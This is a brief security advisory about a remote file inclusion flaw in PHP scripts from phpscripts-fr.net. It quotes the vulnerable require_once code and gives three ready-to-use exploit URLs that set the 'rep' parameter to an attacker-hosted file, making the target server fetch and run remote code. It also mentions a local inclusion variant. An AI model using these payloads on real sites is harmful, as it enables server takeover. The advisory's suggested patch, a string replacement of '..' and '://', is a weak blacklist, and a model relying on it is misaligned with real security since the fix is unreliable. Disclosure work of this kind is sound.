Informations : 

°°°°°°°°°°°°°° 

Website : http://www.phpscripts-fr.net

Version : all

Problem : Include file 







PHP Code/Location : 

°°°°°°°°°°°°°°°°°°° 

config/fonctions.lib.php

derniers_commentaires.php

admin.php 

------------------------------------------------------------------ 

if (!isset($rep)) $rep = './';

require_once($rep.'config/fonctions.lib.php');

require_once($rep.'langues/'.$langue.'.lang.php');

------------------------------------------------------------------ 









Exploit : 

°°°°°°°°° 

http://[target]/config/fonctions.lib.php?rep=http://[attacker]/file.ext%3f

http://[target]/derniers_commentaires.php?rep=http://[attacker]/file.ext%3f

http://[target]/admin.php?rep=http://[attacker]/file.ext%3f





(the same but in local with = /langues/'.$langue.'.lang.php )





Patch : 

°°°°°°° 

You must to put a filter on the variable $rep and $langue.

like=

$rep= str_replace("..","lol",$rep);

AND

$rep= str_replace("://","lol",$rep);

(same with $langue)



Nourredine Himeur



www.security-challenge.com